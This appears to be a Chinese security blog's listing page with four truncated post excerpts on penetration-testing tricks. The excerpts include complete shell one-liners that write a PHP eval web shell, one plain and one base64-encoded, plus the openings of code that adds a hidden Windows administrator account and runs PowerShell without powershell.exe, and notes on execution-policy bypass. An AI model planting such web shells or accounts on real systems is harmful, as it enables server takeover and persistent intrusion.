摘要：1.echo直接写入 echo '<?php eval($_POST[1]); ?>' > 1.php 2.base64写入 echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php 3.绕过重定向符 echo "ZWNobyAiU 阅读全文

摘要：原文 https://mp.weixin.qq.com/s/5Iitrfst3TXd8sRCfq6sHw python2，默认添加Test1234，密码Test@1234，组Administrators。 import ctypes from ctypes import wintypes from 阅读全文

摘要：通过代码直接调用System.Management，替代powershell.exe c#代码，保存为1.cs： using System.Collections.ObjectModel; using System.Management.Automation; using System.Manage 阅读全文

摘要：一、powershell执行策略 Unrestricted 权限最高，可以不受限制执行任意脚本 Restricted 默认策略，不允许任意脚本的执行 AllSigned 所有脚本必须经过签名运行 RemoteSigned 本地脚本无限制，但是对来自网络的脚本必须经过签名 Bypass 没有任何限制和 阅读全文